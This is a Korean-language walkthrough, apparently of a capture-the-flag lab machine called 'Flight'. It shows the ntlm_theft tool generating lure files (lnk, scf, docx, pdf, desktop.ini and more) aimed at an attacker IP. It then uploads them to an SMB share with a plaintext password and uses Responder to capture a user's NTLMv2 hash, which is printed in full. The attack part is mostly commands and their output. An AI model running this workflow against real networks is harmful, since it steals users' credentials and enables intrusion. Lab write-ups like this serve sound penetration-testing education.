1. 개요
Victim PC에 악성 파일들을 설치해서 해커(공격자)의 컴퓨터로 접속할 수 있게 만드는 ‘함정 파일’을 한 번에 생성하는 파일이다.
2. 사용법
2.1. 설치
설치는 github 에 있는 코드를 다운받아 실시한다.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# git clone https://github.com/Greenwolf/ntlm_theft.git
Cloning into 'ntlm_theft'...
remote: Enumerating objects: 151, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 151 (delta 31), reused 24 (delta 24), pack-reused 113 (from 1)
Receiving objects: 100% (151/151), 2.12 MiB | 9.58 MiB/s, done.
Resolving deltas: 100% (73/73), done.
2.2. 파일 생성
┌──(root㉿kali)-[/home/kali/labs/Flight/ntlm_theft]
└─# python ntlm_theft.py -g all -s 10.10.14.143 -f flight
/home/kali/labs/Flight/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: flight/flight.scf (BROWSE TO FOLDER)
Created: flight/flight-(url).url (BROWSE TO FOLDER)
Created: flight/flight-(icon).url (BROWSE TO FOLDER)
Created: flight/flight.lnk (BROWSE TO FOLDER)
Created: flight/flight.rtf (OPEN)
Created: flight/flight-(stylesheet).xml (OPEN)
Created: flight/flight-(fulldocx).xml (OPEN)
Created: flight/flight.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: flight/flight-(includepicture).docx (OPEN)
Created: flight/flight-(remotetemplate).docx (OPEN)
Created: flight/flight-(frameset).docx (OPEN)
Created: flight/flight-(externalcell).xlsx (OPEN)
Created: flight/flight.wax (OPEN)
Created: flight/flight.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: flight/flight.asx (OPEN)
Created: flight/flight.jnlp (OPEN)
Created: flight/flight.application (DOWNLOAD AND OPEN)
Created: flight/flight.pdf (OPEN AND ALLOW)
Created: flight/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: flight/flight.library-ms (BROWSE TO FOLDER)
Created: flight/Autorun.inf (BROWSE TO FOLDER)
Created: flight/desktop.ini (BROWSE TO FOLDER)
Created: flight/flight.theme (THEME TO INSTALL
Generation Complete.
2.2.1. 생성된 파일 확인
flight 폴더 내부에 생성돼 있다.
┌──(root㉿kali)-[/home/…/labs/Flight/Flight-2/ntlm_theft]
└─# cd flight
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# ls
Autorun.inf 'flight-(externalcell).xlsx' flight.htm flight.library-ms 'flight-(remotetemplate).docx' flight.theme
desktop.ini 'flight-(frameset).docx' 'flight-(icon).url' flight.lnk flight.rtf 'flight-(url).url'
flight.application 'flight-(fulldocx).xml' 'flight-(includepicture).docx' flight.m3u flight.scf flight.wax
flight.asx 'flight-(handler).htm' flight.jnlp flight.pdf 'flight-(stylesheet).xml' zoom-attack-instructions.txt
2.3. smbclient 를 통한 업로드
┌──(root㉿kali)-[/home/…/Flight/Flight-2/ntlm_theft/flight]
└─# smbclient //10.129.228.120/Shared -U s.moon%'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \flight.asx
putting file flight-(fulldocx).xml as \flight-(fulldocx).xml (75.7 kb/s) (average 75.7 kb/s)
putting file flight.theme as \flight.theme (2.9 kb/s) (average 48.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.lnk
NT_STATUS_ACCESS_DENIED opening remote file \flight-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.scf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(frameset).docx
NT_STATUS_ACCESS_DENIED opening remote file \flight.pdf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \flight.wax
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \flight-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \flight-(remotetemplate).docx
putting file flight-(stylesheet).xml as \flight-(stylesheet).xml (0.3 kb/s) (average 35.3 kb/s)
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 27.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight.rtf
NT_STATUS_ACCESS_DENIED opening remote file \flight.m3u
NT_STATUS_ACCESS_DENIED opening remote file \flight.htm
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file flight.jnlp as \flight.jnlp (0.3 kb/s) (average 23.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \flight-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \flight-(handler).htm
putting file flight.application as \flight.application (2.9 kb/s) (average 20.0 kb/s)
putting file flight.library-ms as \flight.library-ms (2.1 kb/s) (average 17.6 kb/s)
smb: \>
2.4. responder 를 통한 수신
responder 를 통해서 업로드한 파일을 거쳐 NTLM 이 내 kali 로 전송되는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[...SNIP...]
[SMB] NTLMv2-SSP Client : 10.129.228.120
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:a58779842e69f28b:8B5309D078EC11FDCF508D399A38E26A:010100000000000080FBB73A3173DC01775619EC463E385E0000000002000800330056004200440001001E00570049004E002D0057004B0043005600560057004D004E0041005800390004003400570049004E002D0057004B0043005600560057004D004E004100580039002E0033005600420044002E004C004F00430041004C000300140033005600420044002E004C004F00430041004C000500140033005600420044002E004C004F00430041004C000700080080FBB73A3173DC0106000400020000000800300030000000000000000000000000300000A3518CA9C8C6D3E36886ED27F3DC2A4E5273E31F6322EF6C44444C443AB420320A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340033000000000000000000
[*] Skipping previously captured hash for flight.htb\c.bum
[...SNIP...]